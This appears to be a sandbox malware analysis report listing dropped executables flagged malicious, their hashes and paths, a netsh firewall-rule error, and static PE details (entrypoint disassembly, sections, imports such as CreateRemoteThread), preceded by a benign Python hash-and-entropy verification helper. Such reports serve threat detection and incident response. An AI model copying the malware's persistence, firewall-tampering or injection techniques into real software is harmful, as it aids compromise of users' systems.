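The per-file fields above (size, 8-bit entropy, the Encrypted flag, the four hashes, the printable Preview and the section names visible inside it) are all derived from the dropped file's bytes and can be recomputed locally to confirm that a sample you hold is the one the report describes. The following Python helper is an added example for this report section; it is not Joe Sandbox's own code and does not reproduce its internals. The Encrypted threshold (7.9) is an assumption chosen only because it separates the values on this page (7.9977 is flagged true, 7.8501 false); the preview length, the field names and the minimal PE built by build_sample_pe are constructed for the example.

```python
import hashlib
import math
import struct

# Assumption: the report does not state the cut-off behind its "Encrypted" flag.
# 7.9 is chosen because it separates the entries on this page (7.9977 -> true, 7.85 -> false).
ENCRYPTED_THRESHOLD = 7.9


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in the range 0.0..8.0 (the report's 'Entropy (8bit)')."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def preview(data: bytes, length: int = 96) -> str:
    """Printable ASCII for the first bytes, '.' for everything else (the report's 'Preview')."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:length])


def pe_section_names(data: bytes):
    """Section names of a PE image, or None when the MZ/PE headers do not parse.

    e_lfanew is the 32-bit offset at 0x3C of the DOS header; the 20-byte COFF file
    header follows the 4-byte 'PE\\0\\0' signature; the 40-byte section headers start
    right after the optional header, whose size is the COFF header's 16-bit field at +16.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_header_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_header_size
    names = []
    for i in range(num_sections):
        raw = data[table + i * 40: table + i * 40 + 8]
        if len(raw) < 8:
            break  # truncated section table: report what was readable
        names.append(raw.split(b"\0", 1)[0].decode("latin-1"))
    return names


def triage(data: bytes) -> dict:
    """Recompute the per-file fields the report lists for a dropped file."""
    entropy = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": entropy,
        "encrypted": entropy >= ENCRYPTED_THRESHOLD,
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
        "sections": pe_section_names(data),
        "preview": preview(data),
    }


def matches_report(data: bytes, reported: dict) -> bool:
    """True when every hash given in `reported` (keys md5/sha1/sha256/sha512) matches the bytes."""
    ours = triage(data)
    return all(ours[k] == v.upper() for k, v in reported.items() if k in ours)


def build_sample_pe(section_names) -> bytes:
    """Constructed minimal PE32 header with the given section names (sample input only)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE signature right after the DOS header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0xE0, 0x102)
    optional = bytes(0xE0)  # zeroed PE32 optional header
    sections = b"".join(n.encode().ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + coff + optional + sections


if __name__ == "__main__":
    sample = build_sample_pe([".text", ".data", ".sutala", ".rsrc"])
    for key, value in triage(sample).items():
        print(f"{key}: {value}")
```

To check a real sample against an entry above, read the file as bytes and pass the report's MD5/SHA1/SHA-256/SHA-512 to matches_report; a mismatch on any one digest means you are not holding the file the report analysed. Odd section names such as .sutala or .tojid, which pe_section_names surfaces from the header, are worth recording alongside the hashes because they survive recompilation of the payload while the digests do not.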

C:\Users\user\AppData\Local\Temp\FA5C.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: modified
Size (bytes): 537088
Entropy (8bit): 5.840438491186833
Encrypted: false
SSDEEP: 12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
MD5: D7DF01D8158BFADDC8BA48390E52F355
SHA1: 7B885368AA9459CE6E88D70F48C2225352FAB6EF
SHA-256: 4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
SHA-512: 63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
Malicious: true
Antivirus:
• Avira, Detection: 100%
• Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\gaystiqf.exe
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\E2A6.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):12005888
                                                                                                                                                                                            Entropy (8bit):3.8030917940266584
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:pwbDZlpg+MKH0e+F4a3TCkh4hXfcAg4SzqHeBcgKlClClClClClClClClClClCl8:pUZfgTKH014UBqhEAg4fHe
                                                                                                                                                                                            MD5:6D07EFE4270BD10431D8E32CADCFF4E7
                                                                                                                                                                                            SHA1:AD08F50151D2F7587196092F97BB24BB696C3084
                                                                                                                                                                                            SHA-256:2476273703617870AE392F166BC07D346596D23A159BF762FD5468844B70E33F
                                                                                                                                                                                            SHA-512:03E36F3E9821FB681436A6ED381FB0E03B0EE1DEC5E7EDD27A5A3A3289A9D6EA896CD61F7E7BC355D4E2D34B200F50BC5CEDB36BE02BBDF5C781CC49B77CCD38
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\adijaeg
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):320000
                                                                                                                                                                                            Entropy (8bit):6.68963832251392
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:03Oruhy9+2efARaYhqUc9xm1IQgUS1u2NG03OF:aOrm0JRzp0x/QgUp2N6
                                                                                                                                                                                            MD5:F768F4A81E8B87D6990895A35B8D7D6C
                                                                                                                                                                                            SHA1:D0E5C1E975EC41E222F99F7A235D85317A1BE3A7
                                                                                                                                                                                            SHA-256:164149035D4A3D2EDBA76C0601F6F83E04D45D7C057D221130C57FC9B13FD5B5
                                                                                                                                                                                            SHA-512:004DFFBFCF0F36E6C4A411D3D499F25D8441F98F465D1B8A704CE9E9004D2785604C15F96E33A9761DEFE4AE1454E84BD76DD5CAE1A3658EF14D301FE0B69720
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\adijaeg:Zone.Identifier
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                                                            C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe (copy)
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):12005888
                                                                                                                                                                                            Entropy (8bit):3.8030917940266584
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:pwbDZlpg+MKH0e+F4a3TCkh4hXfcAg4SzqHeBcgKlClClClClClClClClClClCl8:pUZfgTKH014UBqhEAg4fHe
                                                                                                                                                                                            MD5:6D07EFE4270BD10431D8E32CADCFF4E7
                                                                                                                                                                                            SHA1:AD08F50151D2F7587196092F97BB24BB696C3084
                                                                                                                                                                                            SHA-256:2476273703617870AE392F166BC07D346596D23A159BF762FD5468844B70E33F
                                                                                                                                                                                            SHA-512:03E36F3E9821FB681436A6ED381FB0E03B0EE1DEC5E7EDD27A5A3A3289A9D6EA896CD61F7E7BC355D4E2D34B200F50BC5CEDB36BE02BBDF5C781CC49B77CCD38
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1572864
                                                                                                                                                                                            Entropy (8bit):4.23827032270778
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:VH9yhjdQZT0wNxPwkQ9LLFQQvolLhLg0/+8K7vGneigAgc8O:V9yhjdQZT0CxPwJJv
                                                                                                                                                                                            MD5:B057F97299DBE5E945EEF8754F5D4597
                                                                                                                                                                                            SHA1:C6230D218779F120F9911265D4D3BE4C8D753618
                                                                                                                                                                                            SHA-256:286C246A52C29E67BA99172CCB226A45CF05253EE28354730FE94FCB6F8D203A
                                                                                                                                                                                            SHA-512:74ACDC737EFB2B39C740F422202E9392F956790398E9C3EC35B00A8BCCE0021D75F834C029D88DA82E13F6983BFB50E8850DA397CBF7E6889C48738CBE047F8F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                            Entropy (8bit):3.3475884053493443
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:hLz5K5vRv4KgnVVeeDze31NKZtjfT8GRwU3AsPzM8i:9NKPg/eeDzelNYtjoGRwURM8
                                                                                                                                                                                            MD5:A5E06A1D69185A2B857B67E5B04572E8
                                                                                                                                                                                            SHA1:85572781BB9F1FCF67A9FCC48147B01F9D022CF9
                                                                                                                                                                                            SHA-256:361D01FAB30CC588055ACC3204B221A57029A22C9E796F38FB98A2EF7FAAB011
                                                                                                                                                                                            SHA-512:249EE970D19B9CFDEF7BFD65A660C187723B3E6B5813542B33D8A8B18757B4169F5E1918F24A5D83B8D1E1839481AF7A3F1E46D65CB60A582F88A87CFC2CC1AD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            \Device\ConDrv
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3773
                                                                                                                                                                                            Entropy (8bit):4.7109073551842435
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                                                                                                                                            MD5:DA3247A302D70819F10BCEEBAF400503
                                                                                                                                                                                            SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                                                                                                                                            SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                                                                                                                                            SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                                                                                                                                                                            Static File Info

                                                                                                                                                                                            General

                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Entropy (8bit):6.68963832251392
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                            File name:sbxGIUIhRd.exe
                                                                                                                                                                                            File size:320000
                                                                                                                                                                                            MD5:f768f4a81e8b87d6990895a35b8d7d6c
                                                                                                                                                                                            SHA1:d0e5c1e975ec41e222f99f7a235d85317a1be3a7
                                                                                                                                                                                            SHA256:164149035d4a3d2edba76c0601f6f83e04d45d7c057d221130c57fc9b13fd5b5
                                                                                                                                                                                            SHA512:004dffbfcf0f36e6c4a411d3d499f25d8441f98f465d1b8a704ce9e9004d2785604c15f96e33a9761defe4ae1454e84bd76dd5cae1a3658ef14d301fe0b69720
                                                                                                                                                                                            SSDEEP:6144:03Oruhy9+2efARaYhqUc9xm1IQgUS1u2NG03OF:aOrm0JRzp0x/QgUp2N6
                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R.....g.R..])...R...S...R.......R.......R.......R.Rich..R.................PE..L......`...................

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:c8d0d8e0f8e0f0e8

                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                            General

                                                                                                                                                                                            Entrypoint:0x41b620
                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                            Time Stamp:0x60CC14F0 [Fri Jun 18 03:37:20 2021 UTC]
                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                            Import Hash:64f7fef844b1e4fdfabf9d9b629075a0

                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                            Instruction
                                                                                                                                                                                            mov edi, edi
                                                                                                                                                                                            push ebp
                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                            call 00007F67B457919Bh
                                                                                                                                                                                            call 00007F67B456C286h
                                                                                                                                                                                            pop ebp
                                                                                                                                                                                            ret
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            int3
                                                                                                                                                                                            mov edi, edi
                                                                                                                                                                                            push ebp
                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                            push FFFFFFFEh
                                                                                                                                                                                            push 0043DC28h
                                                                                                                                                                                            push 0041E800h
                                                                                                                                                                                            mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                            push eax
                                                                                                                                                                                            add esp, FFFFFF94h
                                                                                                                                                                                            push ebx
                                                                                                                                                                                            push esi
                                                                                                                                                                                            push edi
                                                                                                                                                                                            mov eax, dword ptr [00440354h]
                                                                                                                                                                                            xor dword ptr [ebp-08h], eax
                                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                                            push eax
                                                                                                                                                                                            lea eax, dword ptr [ebp-10h]
                                                                                                                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                            mov dword ptr [ebp-18h], esp
                                                                                                                                                                                            mov dword ptr [ebp-70h], 00000000h
                                                                                                                                                                                            mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                            lea eax, dword ptr [ebp-60h]
                                                                                                                                                                                            push eax
                                                                                                                                                                                            call dword ptr [004010A0h]
                                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                            jmp 00007F67B456C298h
                                                                                                                                                                                            mov eax, 00000001h
                                                                                                                                                                                            ret
                                                                                                                                                                                            mov esp, dword ptr [ebp-18h]
                                                                                                                                                                                            mov dword ptr [ebp-78h], 000000FFh
                                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                            mov eax, dword ptr [ebp-78h]
                                                                                                                                                                                            jmp 00007F67B456C3C7h
                                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                            call 00007F67B456C404h
                                                                                                                                                                                            mov dword ptr [ebp-6Ch], eax
                                                                                                                                                                                            push 00000001h
                                                                                                                                                                                            call 00007F67B4579B8Ah
                                                                                                                                                                                            add esp, 04h
                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                            jne 00007F67B456C27Ch
                                                                                                                                                                                            push 0000001Ch
                                                                                                                                                                                            call 00007F67B456C3BCh
                                                                                                                                                                                            add esp, 04h
                                                                                                                                                                                            call 00007F67B4575364h
                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                            jne 00007F67B456C27Ch
                                                                                                                                                                                            push 00000010h

                                                                                                                                                                                            Rich Headers

                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                            • [ C ] VS2008 build 21022
                                                                                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                                                                                            • [ASM] VS2008 build 21022
                                                                                                                                                                                            • [LNK] VS2008 build 21022
                                                                                                                                                                                            • [RES] VS2008 build 21022
                                                                                                                                                                                            • [C++] VS2008 build 21022

                                                                                                                                                                                            Data Directories

                                                                                                                                                                                             Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_IMPORT          0x3e354          0x28          .text
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_RESOURCE        0x150000         0x83b8        .rsrc
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_BASERELOC       0x159000         0x1dfc        .reloc
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_DEBUG           0x1390           0x1c          .text
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x9100           0x40          .text
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_IAT             0x1000           0x344         .text
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                                                                                                                                             IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3e6ce | 0x3e800 | False | 0.582125 | data | 6.96344242356 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x40000 | 0x10c988 | 0x1800 | False | 0.340657552083 | data | 3.46395750767 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.zas | 0x14d000 | 0x5 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.give | 0x14e000 | 0xea | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.riyevol | 0x14f000 | 0xd93 | 0xe00 | False | 0.00697544642857 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x150000 | 0x83b8 | 0x8400 | False | 0.597271543561 | data | 5.82672582834 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x159000 | 0x4658 | 0x4800 | False | 0.346462673611 | data | 3.68432452042 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
AFX_DIALOG_LAYOUT | 0x156ce8 | 0x2 | data | Dutch | Netherlands
AFX_DIALOG_LAYOUT | 0x156ce0 | 0x2 | data | Dutch | Netherlands
AFX_DIALOG_LAYOUT | 0x156cf0 | 0x2 | data | Dutch | Netherlands
AFX_DIALOG_LAYOUT | 0x156cf8 | 0x2 | data | Dutch | Netherlands
CIDAFICUDUROSOTAROM | 0x1565c8 | 0x6c7 | ASCII text, with very long lines, with no line terminators | Spanish | Colombia
RT_CURSOR | 0x156d00 | 0x8a8 | dBase III DBT, version number 0, next free block index 40, 1st item "\251\317" | Dutch | Netherlands
RT_ICON | 0x1506e0 | 0x6c8 | data | Spanish | Colombia
RT_ICON | 0x150da8 | 0x568 | GLS_BINARY_LSB_FIRST | Spanish | Colombia
RT_ICON | 0x151310 | 0x10a8 | data | Spanish | Colombia
RT_ICON | 0x1523b8 | 0x988 | dBase III DBT, version number 0, next free block index 40 | Spanish | Colombia
RT_ICON | 0x152d40 | 0x468 | GLS_BINARY_LSB_FIRST | Spanish | Colombia
RT_ICON | 0x1531f8 | 0x8a8 | data | Spanish | Colombia
RT_ICON | 0x153aa0 | 0x6c8 | data | Spanish | Colombia
RT_ICON | 0x154168 | 0x568 | GLS_BINARY_LSB_FIRST | Spanish | Colombia
RT_ICON | 0x1546d0 | 0x10a8 | data | Spanish | Colombia
RT_ICON | 0x155778 | 0x988 | data | Spanish | Colombia
RT_ICON | 0x156100 | 0x468 | GLS_BINARY_LSB_FIRST | Spanish | Colombia
RT_STRING | 0x1575c0 | 0xe4 | data | Dutch | Netherlands
RT_STRING | 0x1576a8 | 0x3a8 | data | Dutch | Netherlands
RT_STRING | 0x157a50 | 0x6e6 | data | Dutch | Netherlands
RT_STRING | 0x158138 | 0x1a0 | data | Dutch | Netherlands
RT_STRING | 0x1582d8 | 0xdc | data | Dutch | Netherlands
RT_ACCELERATOR | 0x156ca0 | 0x10 | data | Dutch | Netherlands
RT_ACCELERATOR | 0x156c90 | 0x10 | data | Dutch | Netherlands
RT_GROUP_CURSOR | 0x1575a8 | 0x14 | data | Dutch | Netherlands
RT_GROUP_ICON | 0x1531a8 | 0x4c | data | Spanish | Colombia
RT_GROUP_ICON | 0x156568 | 0x5a | data | Spanish | Colombia
None | 0x156cc0 | 0xa | data | Dutch | Netherlands
None | 0x156cd0 | 0xa | data | Dutch | Netherlands
None | 0x156cb0 | 0xa | data | Dutch | Netherlands

Imports

DLL | Import
KERNEL32.dll | CallNamedPipeW, TerminateProcess, GetExitCodeProcess, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthA, GetDefaultCommConfigW, FindFirstFileExW, GetDriveTypeA, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameW, CopyFileA, TlsGetValue, SetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, SetPriorityClass, WritePrivateProfileStringA, GetProcessHeaps, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, WriteProfileSectionW, GetProfileStringA, GetConsoleCursorInfo, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, ReadFileScatter, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceW, WriteConsoleW, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, FindActCtxSectionStringA, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBW, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, GetOverlappedResult, SetFileShortNameW, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetModuleHandleW, WriteConsoleOutputCharacterA, GetConsoleMode, HeapFree, OpenMutexA, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetConsoleAliasesLengthW, GetProcessVersion, lstrcpynA, SetNamedPipeHandleState, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, AssignProcessToJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, 